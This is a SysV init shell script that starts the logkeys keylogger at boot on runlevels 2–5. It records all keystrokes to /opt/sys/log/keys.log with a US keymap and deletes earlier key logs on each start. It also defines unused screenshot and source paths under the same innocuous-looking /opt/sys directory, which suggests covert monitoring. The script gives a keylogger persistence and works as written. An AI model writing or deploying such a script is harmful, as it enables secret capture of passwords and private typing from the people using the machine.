#! /bin/sh
### BEGIN INIT INFO
# Provides:          logkeys
# Required-Start:    $remote_fs
# Required-Stop:     $remote_fs
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Start the logkeys keylogger.
# Description: Start the logkeys keylogger.
### END INIT INFO



logPath="/opt/sys/log"
screenshotPath="/opt/sys/shots"
srcPath="/opt/sys/src"

cd $logPath

logFileToRemove=`ls | grep "keys*"`
rm $logFileToRemove
touch keys.log

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/usr/bin/logkeys
DAEMON_OPTS=""
NAME=logkeys
DESC=logkeys

#test -x $DAEMON || exit 0

# Include logkeys defaults if available
if [ -f /etc/default/logkeys ] ; then
	. /etc/default/logkeys
fi

. /lib/lsb/init-functions

# Quit quietly, if $ENABLED is 0.
#test "$ENABLED" != "0" || exit 0

DAEMON_OPTS="-s -m /opt/sys/log/en_US.map -o /opt/sys/log/keys.log"

set -e

case "$1" in
  start)
	echo -n "Starting $DESC: "
	start-stop-daemon --start --quiet --pidfile /var/run/$NAME.pid \
		--exec $DAEMON -- $DAEMON_OPTS
	echo "$NAME."
	;;
  stop)
	echo -n "Stopping $DESC: "
	start-stop-daemon --stop --oknodo --chuid root --quiet --pidfile /var/run/$NAME.pid --exec $DAEMON
	echo "$NAME."
	;;
  status)
    status_of_proc $DAEMON $NAME
    ;;
  #reload)
	#
	#	If the daemon can reload its config files on the fly
	#	for example by sending it SIGHUP, do it here.
	#
	#	If the daemon responds to changes in its config file
	#	directly anyway, make this a do-nothing entry.
	#
	# echo "Reloading $DESC configuration files."
	# start-stop-daemon --stop --signal 1 --quiet --pidfile \
	#	/var/run/$NAME.pid.lock --exec $DAEMON
  #;;
  restart|force-reload)
	#
	#	If the "reload" option is implemented, move the "force-reload"
	#	option to the "reload" entry above. If not, "force-reload" is
	#	just the same as "restart".
	#
	echo -n "Restarting $DESC: "
	start-stop-daemon --stop --oknodo --quiet --pidfile \
		/var/run/$NAME.pid --exec $DAEMON
	sleep 1
	start-stop-daemon --start --quiet --pidfile \
		/var/run/$NAME.pid --exec $DAEMON -- $DAEMON_OPTS
	echo "$NAME."
	;;
  *)
	N=/etc/init.d/$NAME
	# echo "Usage: $N {start|stop|restart|status|reload|force-reload}" >&2
	echo "Usage: $N {start|stop|restart|force-reload}" >&2
	exit 1
	;;
esac

exit 0